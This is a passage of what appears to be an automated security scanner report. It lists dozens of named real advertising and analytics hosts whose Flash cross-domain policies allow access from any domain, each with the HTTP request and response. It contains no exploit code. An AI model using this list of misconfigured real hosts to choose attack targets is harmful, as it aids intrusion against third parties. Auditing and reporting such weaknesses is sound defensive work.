Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.sapha.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 13 Jun 2009 07:57:06 GMT
ETag: "d30807e-140-2bd11880"
Accept-Ranges: bytes
Content-Length: 320
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.7. http://apr.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apr.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:52 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n10), ms lax-agg-n10 ( origin>CONN)
ETag: "a35c9-83-4aad0437c9440"
Cache-Control: max-age=604800
Expires: Mon, 12 Sep 2011 02:30:52 GMT
Age: 0
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:49:29 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.8. http://cache.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:56 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n14 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 262318
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 05 Sep 2011 02:30:58 GMT
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.10. http://ce.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:54 GMT
Server: PWS/1.7.3.3
X-Px: ht-d lax-agg-n55.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 220198
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.11. http://dellinc.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dellinc.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 16:19:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.12. http://eas.apm.emediate.eu/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://eas.apm.emediate.eu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eas.apm.emediate.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 16 Mar 2010 12:17:57 GMT
ETag: "143-481e9fce3e740"
Accept-Ranges: bytes
Content-Length: 323
Cache-Control: max-age=0
Expires: Mon, 05 Sep 2011 01:54:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:32:04 GMT
Expires: Fri, 02 Sep 2011 23:18:02 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 75163
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.14. https://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:56:51 GMT
Expires: Sun, 04 Sep 2011 23:56:51 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 76846

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.15. http://gacela.eu/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gacela.eu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gacela.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 13:45:59 GMT
ETag: "c1bd87-d1-4ab40884013c0"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.16. http://h41174.www4.hp.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://h41174.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.17. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 03-Sep-2016 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.18. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.19. http://m.webtrends.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:a1b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:11 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.20. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:43 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.21. http://met1.hp.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
xserver: www606
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.22. http://metrics.skype.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www385
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.23. http://microsoftsto.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:13 GMT
Server: Omniture DC/2.0.0
xserver: www376
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.24. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:34 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.25. http://nsm.dell.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nsm.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nsm.dell.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
xserver: www38
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.26. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:42 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:35:44 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.27. http://pixel.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.28. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca1 3233
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.29. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 21:13:41 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.30. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 16:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 16:19:50 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.31. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:04 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.32. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.33. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "38a03db-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.34. http://vap1den1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:27:30 GMT
ETag: "1881cb-83-4aacf1e4a9880"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.35. http://vap1iad1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1iad1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:41:26 GMT
ETag: "baf2a-83-4aad026b29580"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.36. http://vap1iad2.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1iad2.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1iad2.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:34 GMT
ETag: "e7efc-83-4aad043c8df80"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.37. http://vap1sfo1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1sfo1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:50:28 GMT
ETag: "b6f8a-83-4aad04700d900"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.38. http://vap2den1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
